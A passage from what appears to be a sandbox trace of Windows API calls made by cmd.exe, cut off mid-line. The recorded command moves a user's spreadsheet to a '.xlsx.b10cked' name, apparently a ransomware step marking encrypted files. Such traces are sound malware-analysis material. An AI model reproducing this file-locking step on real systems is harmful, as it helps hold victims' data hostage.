region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 10688 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 10689 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10690 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10691 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10692 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 10693 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10854 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10855 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10856 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10857 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 10858 start_va = 0x500000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000500000" filename = "" Region: id = 10859 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 10860 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10861 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 10862 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10863 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10864 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10865 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 10866 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10867 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x000000007f6f0000" filename = "" Region: id = 10868 start_va = 0x3d0000 end_va = 0x497fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 10869 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10870 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 10871 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 10872 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 10873 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 10874 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 10875 start_va = 0x510000 end_va = 0x610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 10876 start_va = 0x620000 end_va = 0x121ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 10877 start_va = 0x1220000 end_va = 0x1382fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Thread: id = 143 os_tid = 0x7fc [0128.790] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fa3c | out: lpSystemTimeAsFileTime=0x26fa3c*(dwLowDateTime=0x86b38e40, dwHighDateTime=0x1d440a9)) [0128.790] GetCurrentProcessId () returned 0x320 [0128.790] GetCurrentThreadId () 
returned 0x7fc [0128.790] GetTickCount () returned 0x29404 [0128.790] QueryPerformanceCounter (in: lpPerformanceCount=0x26fa34 | out: lpPerformanceCount=0x26fa34*=18557942489) returned 1 [0128.791] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0128.791] __set_app_type (_Type=0x1) [0128.791] __p__fmode () returned 0x76b331f4 [0128.791] __p__commode () returned 0x76b331fc [0128.791] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0128.791] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0128.791] GetCurrentThreadId () returned 0x7fc [0128.791] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7fc) returned 0x38 [0128.791] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0128.791] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0128.791] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.791] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0128.791] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f9cc | out: phkResult=0x26f9cc*=0x0) returned 0x2 [0128.792] VirtualQuery (in: lpAddress=0x26fa03, lpBuffer=0x26f99c, dwLength=0x1c | out: lpBuffer=0x26f99c*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0128.792] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f99c, dwLength=0x1c | out: lpBuffer=0x26f99c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0128.792] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f99c, dwLength=0x1c | out: 
lpBuffer=0x26f99c*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0128.792] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f99c, dwLength=0x1c | out: lpBuffer=0x26f99c*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0128.792] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f99c, dwLength=0x1c | out: lpBuffer=0x26f99c*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x60000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0128.792] GetConsoleOutputCP () returned 0x1b5 [0128.792] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0128.792] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0128.792] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.792] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0128.792] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.792] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0128.792] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.792] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0128.792] _get_osfhandle (_FileHandle=0) returned 0x3 [0128.792] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0128.793] _get_osfhandle (_FileHandle=0) returned 0x3 [0128.793] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0128.793] GetEnvironmentStringsW () returned 0x2e0238* [0128.793] FreeEnvironmentStringsW (penv=0x2e0238) returned 1 [0128.793] GetEnvironmentStringsW () returned 0x2e0238* [0128.793] FreeEnvironmentStringsW (penv=0x2e0238) returned 1 [0128.793] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e93c | out: 
phkResult=0x26e93c*=0x40) returned 0x0 [0128.793] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e944, lpData=0x26e948, lpcbData=0x26e940*=0x1000 | out: lpType=0x26e944*=0x0, lpData=0x26e948*=0xc8, lpcbData=0x26e940*=0x1000) returned 0x2 [0128.793] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e944, lpData=0x26e948, lpcbData=0x26e940*=0x1000 | out: lpType=0x26e944*=0x4, lpData=0x26e948*=0x1, lpcbData=0x26e940*=0x4) returned 0x0 [0128.793] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e944, lpData=0x26e948, lpcbData=0x26e940*=0x1000 | out: lpType=0x26e944*=0x0, lpData=0x26e948*=0x1, lpcbData=0x26e940*=0x1000) returned 0x2 [0128.793] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e944, lpData=0x26e948, lpcbData=0x26e940*=0x1000 | out: lpType=0x26e944*=0x4, lpData=0x26e948*=0x0, lpcbData=0x26e940*=0x4) returned 0x0 [0128.793] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e944, lpData=0x26e948, lpcbData=0x26e940*=0x1000 | out: lpType=0x26e944*=0x4, lpData=0x26e948*=0x40, lpcbData=0x26e940*=0x4) returned 0x0 [0128.793] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e944, lpData=0x26e948, lpcbData=0x26e940*=0x1000 | out: lpType=0x26e944*=0x4, lpData=0x26e948*=0x40, lpcbData=0x26e940*=0x4) returned 0x0 [0128.793] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e944, lpData=0x26e948, lpcbData=0x26e940*=0x1000 | out: lpType=0x26e944*=0x0, lpData=0x26e948*=0x40, lpcbData=0x26e940*=0x1000) returned 0x2 [0128.793] RegCloseKey (hKey=0x40) returned 0x0 [0128.793] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e93c | out: phkResult=0x26e93c*=0x40) returned 0x0 [0128.793] RegQueryValueExW (in: 
hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e944, lpData=0x26e948, lpcbData=0x26e940*=0x1000 | out: lpType=0x26e944*=0x0, lpData=0x26e948*=0x40, lpcbData=0x26e940*=0x1000) returned 0x2 [0128.793] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e944, lpData=0x26e948, lpcbData=0x26e940*=0x1000 | out: lpType=0x26e944*=0x4, lpData=0x26e948*=0x1, lpcbData=0x26e940*=0x4) returned 0x0 [0128.793] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e944, lpData=0x26e948, lpcbData=0x26e940*=0x1000 | out: lpType=0x26e944*=0x0, lpData=0x26e948*=0x1, lpcbData=0x26e940*=0x1000) returned 0x2 [0128.794] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e944, lpData=0x26e948, lpcbData=0x26e940*=0x1000 | out: lpType=0x26e944*=0x4, lpData=0x26e948*=0x0, lpcbData=0x26e940*=0x4) returned 0x0 [0128.794] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e944, lpData=0x26e948, lpcbData=0x26e940*=0x1000 | out: lpType=0x26e944*=0x4, lpData=0x26e948*=0x9, lpcbData=0x26e940*=0x4) returned 0x0 [0128.794] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e944, lpData=0x26e948, lpcbData=0x26e940*=0x1000 | out: lpType=0x26e944*=0x4, lpData=0x26e948*=0x9, lpcbData=0x26e940*=0x4) returned 0x0 [0128.794] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e944, lpData=0x26e948, lpcbData=0x26e940*=0x1000 | out: lpType=0x26e944*=0x0, lpData=0x26e948*=0x9, lpcbData=0x26e940*=0x1000) returned 0x2 [0128.794] RegCloseKey (hKey=0x40) returned 0x0 [0128.794] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886363 [0128.794] srand (_Seed=0x5b886363) [0128.794] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\CFAWII~1.XLS\" 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Cf aWIIkKxWa7MD7fCc.xlsx.b10cked\"" [0128.794] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\CFAWII~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Cf aWIIkKxWa7MD7fCc.xlsx.b10cked\"" [0128.794] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0128.794] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2e1998, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0128.794] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0128.794] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0128.794] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0128.794] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0128.794] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0128.794] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0128.794] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0128.794] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0128.794] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0128.794] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0128.794] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0128.794] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0128.795] GetEnvironmentStringsW () returned 0x2e2388* [0128.795] FreeEnvironmentStringsW (penv=0x2e2388) 
returned 1 [0128.795] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.795] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0128.795] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0128.795] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0128.795] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0128.795] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0128.795] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0128.795] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0128.795] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0128.795] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0128.795] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f708 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0128.795] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f708, lpFilePart=0x26f704 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f704*="Desktop") returned 0x18 [0128.795] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0128.795] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f484 | out: lpFindFileData=0x26f484) returned 0x2e0a18 [0128.795] FindClose (in: hFindFile=0x2e0a18 | out: hFindFile=0x2e0a18) returned 1 [0128.795] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f484 | out: lpFindFileData=0x26f484) returned 0x2e0a18 [0128.795] FindClose (in: hFindFile=0x2e0a18 | out: hFindFile=0x2e0a18) returned 1 [0128.796] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f484 | out: lpFindFileData=0x26f484) returned 0x2e0a18 [0128.796] FindClose (in: hFindFile=0x2e0a18 | out: 
hFindFile=0x2e0a18) returned 1 [0128.796] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0128.796] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0128.796] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0128.796] GetEnvironmentStringsW () returned 0x2e0238* [0128.796] FreeEnvironmentStringsW (penv=0x2e0238) returned 1 [0128.796] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0128.796] GetConsoleOutputCP () returned 0x1b5 [0128.796] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0128.796] GetUserDefaultLCID () returned 0x409 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f848, cchData=128 | out: lpLCData="0") returned 2 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f848, cchData=128 | out: lpLCData="0") returned 2 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f848, cchData=128 | out: lpLCData="1") returned 2 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0128.797] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0128.797] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0128.798] GetConsoleTitleW (in: lpConsoleTitle=0x2d0948, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.798] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0128.798] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0128.798] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0128.798] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0128.799] _wcsicmp (_String1="move", _String2=")") returned 68 [0128.799] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0128.799] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0128.799] _wcsicmp (_String1="IF", _String2="move") returned -4 [0128.799] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0128.799] _wcsicmp (_String1="REM", _String2="move") returned 5 [0128.799] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0128.803] GetConsoleTitleW (in: lpConsoleTitle=0x26f540, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.803] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0128.803] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0128.803] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0128.803] _wcsicmp 
(_String1="move", _String2="TYPE") returned -7 [0128.803] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0128.803] _wcsicmp (_String1="move", _String2="CD") returned 10 [0128.803] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0128.803] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0128.803] _wcsicmp (_String1="move", _String2="REN") returned -5 [0128.803] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0128.803] _wcsicmp (_String1="move", _String2="SET") returned -6 [0128.803] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0128.803] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0128.803] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0128.803] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0128.803] _wcsicmp (_String1="move", _String2="MD") returned 11 [0128.803] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0128.803] _wcsicmp (_String1="move", _String2="RD") returned -5 [0128.803] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0128.803] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0128.803] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0128.803] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0128.804] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0128.804] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0128.804] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0128.804] _wcsicmp (_String1="move", _String2="VER") returned -9 [0128.804] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0128.804] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0128.804] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0128.804] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0128.804] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0128.804] _wcsicmp (_String1="move", _String2="START") returned -6 [0128.804] _wcsicmp (_String1="move", _String2="DPATH") returned 9 
[0128.804] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0128.804] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0128.805] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0128.805] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0128.805] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f2fc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f2f4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f2f4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0128.805] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0128.805] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0128.805] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0128.805] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0128.805] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) 
